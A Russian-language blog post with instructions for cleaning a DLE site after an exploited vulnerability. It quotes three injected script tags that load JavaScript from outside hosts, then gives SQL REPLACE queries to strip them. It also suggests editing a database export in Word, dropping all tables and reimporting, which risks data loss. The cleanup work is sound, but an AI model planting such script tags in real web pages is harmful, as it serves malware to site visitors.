Home > MySQL > Чистка DLE от вредоносного кода.

Чистка DLE от вредоносного кода.

Январь 20th, 2011

Как писал ранее в DLE в прошлом году была обнаружена критическая уязвимость позволяющая злоумышленникам выполнять произвольный код.

Кто не успел применить патч, мог подвергнуться атаке. И заполучить в свои новости вредоносные скрипты.

Для избавления от него следует сделать следующее…

Делим их для удобства на части

1.
<script src=»http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js» type=»text/javascript»></script>

2.
<script src=»http://zheenix.msk.ru/abc.js» type=»text/javascript»></script>

3.
<script src=»http://ivan81.ucoz.ru/engine.js» type=»text/javascript»></script>

1 код удалить будет сложнее т.к код после слеша везде разный, поэтому начнем со 2 и 3!

Идем в phpmyadmin, выбираем вкладку SQL, видим окошко и туда вписываем:

UPDATE dle_post
SET
short_story=REPLACE(short_story, ‘<script src=»http://zheenix.msk.ru/abc.js» type=»text/javascript»></script>’, »),
`full_story`=REPLACE(full_story, ‘<script src=»http://zheenix.msk.ru/abc.js» type=»text/javascript»></script>’, »)
WHERE
`short_story` LIKE ‘%<script src=»http://zheenix.msk.ru/abc.js» type=»text/javascript»></script>%’
OR
`full_story` LIKE ‘%<script src=»http://zheenix.msk.ru/abc.js» type=»text/javascript»></script>%’

Нажимаем ОК, после чего пропадет из новостей скрипт №2!

Не закрывая SQL удаляем так же скрипт №3 тоесть выполняем Такой sql запрос:

UPDATE dle_post
SET
short_story=REPLACE(short_story, ‘<script src=»http://ivan81.ucoz.ru/engine.js» type=»text/javascript»></script>’, »),
`full_story`=REPLACE(full_story, ‘<script src=»http://ivan81.ucoz.ru/engine.js» type=»text/javascript»></script>’, »)
WHERE
`short_story` LIKE ‘%<script src=»http://ivan81.ucoz.ru/engine.js» type=»text/javascript»></script>%’
OR
`full_story` LIKE ‘%<script src=»http://ivan81.ucoz.ru/engine.js» type=»text/javascript»></script>%’

Нажимаем ОК!

Скрипт №3 так же удален!

Теперь возьмемся за скрипт №1

В phpmyadmin выбираем вкладку «Экспорт» и нажимаем ОК, сохраняем на компьютер!
Открываем эту базу с помощью Microsoft Word, нажимаем «правка»—»найти» —»заменить» и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем «больше» и ставим галочку на «Подстановочные знаки» , нажимаем «заменить все»!
Этим мы избавились от разного кода! Сохраняем изменения!
Идем в phpmyadmin —> структура —-> и отмечаем все галочки —> далее удаляем все!
Теперь идем во вкладку «импорт» , нажимаем обзор и выбираем нашу измененную БД, ставим вместо utf8 —> cp1251 и нажиимаем ОК! База загружена!

Теперь снова идем во вкладку SQL и выполняем такой запрос:

UPDATE dle_post
SET
short_story=REPLACE(short_story, ‘<script src=»http://zheenix.ru» type=»text/javascript»></script>’, »),
`full_story`=REPLACE(full_story, ‘<script src=»http://zheenix.ru» type=»text/javascript»></script>’, »)
WHERE
`short_story` LIKE ‘%<script src=»http://zheenix.ru» type=»text/javascript»></script>%’
OR
`full_story` LIKE ‘%<script src=»http://zheenix.ru» type=»text/javascript»></script>%’

Нажимаем ОК!
Вот собственно и все!

MySQL , , ,

Перед отправкой формы: